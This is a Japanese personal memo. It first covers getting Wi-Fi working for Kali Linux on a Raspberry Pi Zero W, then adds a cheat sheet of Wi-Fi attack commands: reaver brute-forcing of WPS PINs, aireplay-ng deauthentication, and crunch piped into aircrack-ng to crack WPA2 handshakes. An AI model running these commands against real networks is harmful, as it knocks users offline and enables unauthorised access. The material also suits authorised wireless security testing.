raspberry pi 用のkali linuxダウンロードサイト
https://www.offensive-security.com/kali-linux-arm-images/
以下、built-in wi-fi device (wlan0)が認識されなかった時の、対応手順
1)i installed kali on the sd card.
2)put the sd card in another pi using a usb to microsd adapter
別の起動済みraspbian(pi)環境に SDカードを挿入
3)Then mount the 2 partitons from the card under /mnt and /mnt/boot
mount /dev/sda2 /mnt/
mount /dev/sda1 /mnt/boot/
4)rpi-update the kali image
ROOT_PATH=/mnt BOOT_PATH=/mnt/boot rpi-update
5)change root to the kali image
chroot /mnt/ /bin/bash
6)update the thing
apt-get update
apt-get upgrade
7)install the wireless driver
apt-get install firmware-brcm80211
※ 手元の環境で「404 Not Found」エラーだが、
それでも結果的にはwlan0が動くようになった
8)copy /lib/firmware/brcm/brcmfmac43430-sdio.txt from a rasbian image to /lib/firmware/brcm/brcmfmac43430-sdio.txt on kali
9)edit /etc/network/interfaces
auto wlan0
iface wlan0 inet dhcp
wpa-ssid "mysupercoolssidofdoom"
wpa-psk "mysupercoolpasswordofdoom"
10)exit the chroot, umount the partitons and eject the card
「That will get you kali on the pi zero w with wireless networking. But i cannot get bluetooth to work, and i soooooooo want to use my bluetooth keyboard with it. Sorry about my formatting typing this on my phone.」
だそうです。
参考にしたところ
・Re: Kali Linux Raspberry Pi Zero W - bluetooth (03/18)
https://www.raspberrypi.org/forums/viewtopic.php?t=177530#p1133241
ほぼ、ここの、まるうつしです。
・How To Set Up Kali Linux on the New $10 Raspberry Pi Zero W (07/22)
https://null-byte.wonderhowto.com/how-to/set-up-kali-linux-new-10-raspberry-pi-zero-w-0176819/
興味深いので、後日読んでみたい
・Re4son-Kernel for Raspberry Pi 1/2/3/Zero/Zero W (09/01)
https://whitedome.com.au/re4son/re4son-kernel/
コンパイル済みのカーネルの配布サイト
-- 2018.05.01 追記 -->
・Kali Tutorials
---
5 Steps Wi-Fi
1.airmon-ng
2.airmon-ng stop wlan0
3.airodump-ng wlan0
|Information:
|
| BSSID (Basic Service Set Identification): the MAC address of access point
| Beacons: Number of announcements packets sent by the AP
| #Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
| #/s: Number of data packets per second measure over the last 10 seconds.
| MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
| CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.
| ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.
4.wash -i wlan0 -c "target channel" -C -s
if the WPS Locked status is No, then we are ready to move to step 5.
5.reaver -i wlan0 -b "target mac" --fail-wait=360
---
breaking wpa2-psk (2016/02/21)
airodump-ng wlan0 --bssid "target mac" --channel "target channel" -w "target ap"
aireplay-ng --deauth 20 -a "target mac" wlan0: aireplay-ng --deauth 20 -a "target mac" wlan0
crunch 20 20 0123456789abcdefghijklmnopqrstuvwxyz | aircrack-ng -b "target mac" -x1 -y -w - "target ap".cap
WPA2 Brute Force
> ./crunch 8 8 1234567890abcdefghijklmnopqrstuvwxyz -t passw@@@| aircrack-ng -b And Target BSSID
Aircrack can't take dictionary from stdin?
> echo mywpapassword | aircrack-ng -w - -e devnetwork /tmp/captures.cap
---
HowTo : Pause/Resume Aircrack-ng
where files are saved in the session? #234 (2015/03/29)
> /usr/local/etc/reaver/ or /etc/reaver/
reaver resume from certain pin nr. #233 (2015/03/29)